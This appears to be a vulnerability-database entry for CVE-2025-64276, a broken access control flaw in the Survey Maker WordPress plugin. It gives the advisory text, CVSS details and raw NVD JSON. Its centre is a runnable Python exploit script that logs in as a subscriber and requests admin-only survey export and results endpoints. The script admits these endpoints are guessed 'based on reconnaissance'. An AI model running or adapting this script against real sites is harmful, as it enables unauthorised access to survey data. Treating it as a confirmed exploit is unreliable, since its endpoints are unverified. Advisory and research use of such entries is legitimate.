Security Vulnerability Report
中文
CVE-2025-64276 CVSS 6.5 MEDIUM

CVE-2025-64276

Published: 2025-11-13 10:15:53
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in Ays Pro Survey Maker survey-maker allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Survey Maker: from n/a through <= 5.1.9.4.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Survey Maker (WordPress Plugin) <= 5.1.9.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64276 PoC - Survey Maker Broken Access Control # Target: WordPress site with Survey Maker plugin <= 5.1.9.4 # Requirements: Valid low-privilege account (subscriber role) import requests import sys from urllib.parse import urljoin def exploit_survey_maker(target_url, username, password): """ Exploit Missing Authorization vulnerability in Survey Maker This PoC demonstrates accessing admin-level survey data """ session = requests.Session() # WordPress login login_url = urljoin(target_url, '/wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print(f'[*] Logging in as {username}...') response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in str(session.cookies) and 'wp-settings' not in response.url: print('[-] Login failed') return False print('[+] Login successful') # Exploit: Access admin-only survey endpoints # Replace with actual vulnerable endpoint based on reconnaissance vulnerable_endpoints = [ '/wp-admin/admin-ajax.php?action=ays_survey_export_all_results', '/wp-admin/admin-ajax.php?action=ays_survey_admin_results', '/wp-json/survey-maker/v1/surveys', '/wp-admin/admin.php?page=survey-maker-surveys' ] print('[*] Attempting to access admin-only endpoints...') for endpoint in vulnerable_endpoints: url = urljoin(target_url, endpoint) try: response = session.get(url, timeout=10) if response.status_code == 200 and ('survey' in response.text.lower() or 'export' in response.text.lower()): print(f'[+] VULNERABLE: {endpoint}') print(f' Status: {response.status_code}') print(f' Content preview: {response.text[:200]}...') return True except requests.RequestException as e: print(f'[-] Error accessing {endpoint}: {e}') print('[-] No vulnerable endpoints found or already patched') return False if __name__ == '__main__': if len(sys.argv) < 4: print('Usage: python cve-2025-64276.py <target_url> <username> <password>') print('Example: python cve-2025-64276.py http://example.com subscriber password123') sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_survey_maker(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64276", "sourceIdentifier": "[email protected]", "published": "2025-11-13T10:15:52.940", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Ays Pro Survey Maker survey-maker allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Survey Maker: from n/a through <= 5.1.9.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/survey-maker/vulnerability/wordpress-survey-maker-plugin-5-1-9-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}